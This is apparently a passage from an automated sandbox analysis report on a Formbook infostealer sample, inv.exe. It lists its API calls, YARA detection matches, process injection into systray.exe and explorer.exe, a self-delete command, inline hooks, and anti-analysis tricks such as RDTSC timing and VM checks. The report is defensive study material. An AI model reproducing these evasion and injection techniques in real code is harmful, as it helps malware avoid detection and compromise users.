Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0484A770 NtOpenThread,		5_2_0484A770
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849770 NtSetInformationFile,		5_2_04849770
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048498A0 NtWriteVirtualMemory,		5_2_048498A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048498F0 NtReadVirtualMemory,		5_2_048498F0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849820 NtEnumerateKey,		5_2_04849820
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0484B040 NtSuspendThread,		5_2_0484B040
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048499D0 NtCreateProcessEx,		5_2_048499D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849950 NtQueueApcThread,		5_2_04849950
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849A80 NtOpenDirectoryObject,		5_2_04849A80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849A00 NtProtectVirtualMemory,		5_2_04849A00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849A10 NtQuerySection,		5_2_04849A10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849A20 NtResumeThread,		5_2_04849A20
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0484A3B0 NtGetContextThread,		5_2_0484A3B0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849B00 NtSetValueKey,		5_2_04849B00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0074A060 NtClose,		5_2_0074A060
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0074A110 NtAllocateVirtualMemory,		5_2_0074A110
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_00749F30 NtCreateFile,		5_2_00749F30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_00749FE0 NtReadFile,		5_2_00749FE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0074A08A NtAllocateVirtualMemory,		5_2_0074A08A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_00749FDC NtReadFile,		5_2_00749FDC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_00749FDA NtReadFile,		5_2_00749FDA

Detected potential crypto function

Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_009881F9		0_2_009881F9
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_009743F3		0_2_009743F3
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_00998313		0_2_00998313
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_009A8418		0_2_009A8418
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_0098845E		0_2_0098845E
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_009A8538		0_2_009A8538
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_009886D2		0_2_009886D2
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_00988937		0_2_00988937
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_009A2A60		0_2_009A2A60
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_00988B9C		0_2_00988B9C
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_00988E10		0_2_00988E10
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_009A2F80		0_2_009A2F80
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_009AB025		0_2_009AB025
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_009A33B0		0_2_009A33B0
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_009874AF		0_2_009874AF
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_009A169A		0_2_009A169A
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_009876E1		0_2_009876E1
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_009A98F9		0_2_009A98F9
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_00987922		0_2_00987922
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_009A3A76		0_2_009A3A76
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_00987B54		0_2_00987B54
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_00987D86		0_2_00987D86
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_00987FC7		0_2_00987FC7
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_0040102F		2_2_0040102F
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00401030		2_2_00401030
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_0041D1EF		2_2_0041D1EF
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_0041E18E		2_2_0041E18E
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_0041DAA3		2_2_0041DAA3
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00402D87		2_2_00402D87
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00402D90		2_2_00402D90
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00409E40		2_2_00409E40
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00409E3C		2_2_00409E3C
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_0041D6FE		2_2_0041D6FE
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00402FB0		2_2_00402FB0
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_009AC1A3		2_2_009AC1A3
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_009881F9		2_2_009881F9
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_009743F3		2_2_009743F3
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00998313		2_2_00998313
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_009A8418		2_2_009A8418
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_0098845E		2_2_0098845E
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_009A8538		2_2_009A8538
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_009886D2		2_2_009886D2
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00988937		2_2_00988937
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_009A2A60		2_2_009A2A60
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00988B9C		2_2_00988B9C
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00988E10		2_2_00988E10
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_009A2F80		2_2_009A2F80
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_009AB025		2_2_009AB025
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_009A33B0		2_2_009A33B0
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_009874AF		2_2_009874AF
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_009AB521		2_2_009AB521
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0481841F		5_2_0481841F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048CD466		5_2_048CD466
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04832581		5_2_04832581
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D25DD		5_2_048D25DD
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0481D5E0		5_2_0481D5E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D2D07		5_2_048D2D07
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04800D20		5_2_04800D20
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D1D55		5_2_048D1D55
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D2EF7		5_2_048D2EF7
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048CD616		5_2_048CD616
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04826E30		5_2_04826E30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048DDFCE		5_2_048DDFCE
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D1FF1		5_2_048D1FF1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0481B090		5_2_0481B090
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048320A0		5_2_048320A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D20A8		5_2_048D20A8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D28EC		5_2_048D28EC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C1002		5_2_048C1002
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048DE824		5_2_048DE824
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0480F900		5_2_0480F900
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04824120		5_2_04824120
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D22AE		5_2_048D22AE
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048BFA2B		5_2_048BFA2B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483EBB0		5_2_0483EBB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C03DA		5_2_048C03DA
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048CDBD2		5_2_048CDBD2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D2B28		5_2_048D2B28
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0074D1EF		5_2_0074D1EF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0074E18E		5_2_0074E18E
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0074DAAF		5_2_0074DAAF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_00732D90		5_2_00732D90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_00732D87		5_2_00732D87
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_00739E40		5_2_00739E40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_00739E3C		5_2_00739E3C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0074D6FE		5_2_0074D6FE
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_00732FB0		5_2_00732FB0

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 0480B150 appears 45 times
Source: C:\Users\user\Desktop\inv.exe	Code function: String function: 009721C0 appears 89 times
Source: C:\Users\user\Desktop\inv.exe	Code function: String function: 00999A17 appears 65 times
Source: C:\Users\user\Desktop\inv.exe	Code function: String function: 00973A87 appears 38 times
Source: C:\Users\user\Desktop\inv.exe	Code function: String function: 0099508F appears 59 times

Sample file is different than original file name gathered from version info

Source: inv.exe, 00000000.00000003.243748598.0000000002876000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs inv.exe
Source: inv.exe, 00000002.00000002.283962839.0000000001449000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenamesystray.exej% vs inv.exe
Source: inv.exe, 00000002.00000002.284226584.00000000017FF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs inv.exe

Yara signature match

Source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Classification label

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/0@19/7

Creates mutexes

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6792:120:WilError_01

PE file has an executable .text section and no other executable section

Source: inv.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Reads software policies

Source: C:\Users\user\Desktop\inv.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample is known by Antivirus

Source: inv.exe	Virustotal: Detection: 42%
Source: inv.exe	ReversingLabs: Detection: 67%

Spawns processes

Source: unknown	Process created: C:\Users\user\Desktop\inv.exe 'C:\Users\user\Desktop\inv.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Desktop\inv.exe C:\Users\user\Desktop\inv.exe
Source: unknown	Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\inv.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\inv.exe	Process created: C:\Users\user\Desktop\inv.exe C:\Users\user\Desktop\inv.exe			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\inv.exe'			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Jump to behavior

PE file contains a mix of data directories often seen in goodware

Source: inv.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: inv.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: inv.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: inv.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: inv.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: inv.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: inv.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

PE file contains a debug data directory

Source: inv.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:	Binary string: systray.pdb source: inv.exe, 00000002.00000002.283962839.0000000001449000.00000004.00000020.sdmp
Source:	Binary string: systray.pdbGCTL source: inv.exe, 00000002.00000002.283962839.0000000001449000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: inv.exe, 00000000.00000003.239031974.00000000028F0000.00000004.00000001.sdmp, inv.exe, 00000002.00000002.284226584.00000000017FF000.00000040.00000001.sdmp, systray.exe, 00000005.00000002.1316093561.00000000047E0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: inv.exe, 00000000.00000003.239031974.00000000028F0000.00000004.00000001.sdmp, inv.exe, 00000002.00000002.284226584.00000000017FF000.00000040.00000001.sdmp, systray.exe

PE file contains a valid data directory to section mapping

Source: inv.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: inv.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: inv.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: inv.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: inv.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\inv.exe

Code function: 0_2_00971120 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetConsoleWindow,ShowWindow,LoadLibraryA,RpcMgmtEpEltInqBegin,NtCreateSection,NtMapViewOfSection,CloseHandle,CallWindowProcW,

0_2_00971120

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_00972206 push ecx; ret		0_2_00972219
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_0041D0D2 push eax; ret		2_2_0041D0D8
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_0041D0DB push eax; ret		2_2_0041D142
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_0041D085 push eax; ret		2_2_0041D0D8
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_0041D13C push eax; ret		2_2_0041D142
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_0041D1EF push ebp; ret		2_2_0041D6FD
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_0040F345 push edi; retf		2_2_0040F34C
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_0041E7C6 push edx; ret		2_2_0041E83E
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00972206 push ecx; ret		2_2_00972219
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0485D0D1 push ecx; ret		5_2_0485D0E4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0074D0D2 push eax; ret		5_2_0074D0D8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0074D0DB push eax; ret		5_2_0074D142
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0074D085 push eax; ret		5_2_0074D0D8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0074D13C push eax; ret		5_2_0074D142
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0074D1EF push ebp; ret		5_2_0074D6FD
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0074DA9F push cs; iretd		5_2_0074DAAE
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0073F345 push edi; retf		5_2_0073F34C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0074E7C6 push edx; ret		5_2_0074E83E

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEA

Disables application error messsages (SetErrorMode)

Source: C:\Windows\SysWOW64\systray.exe

Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\inv.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\inv.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 00000000007398E4 second address: 00000000007398EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 0000000000739B5E second address: 0000000000739B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\inv.exe

Code function: 2_2_00409A90 rdtsc

2_2_00409A90

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\inv.exe	API coverage: 7.7 %
Source: C:\Users\user\Desktop\inv.exe	API coverage: 1.8 %
Source: C:\Windows\SysWOW64\systray.exe	API coverage: 9.1 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 6996	Thread sleep count: 209 > 30			Jump to behavior
Source: C:\Windows\explorer.exe TID: 6996	Thread sleep time: -418000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 6880	Thread sleep count: 132 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 6880	Thread sleep time: -264000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe	Last function: Thread delayed

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_009929D4 FindFirstFileExW,		0_2_009929D4
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_00992D90 FindFirstFileExW,FindNextFileW,FindClose,		0_2_00992D90
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_009929D4 FindFirstFileExW,		2_2_009929D4
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00992D90 FindFirstFileExW,FindNextFileW,FindClose,		2_2_00992D90

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: explorer.exe, 00000003.00000000.263531873.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000003.00000000.263531873.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000002.1324843429.00000000048E0000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
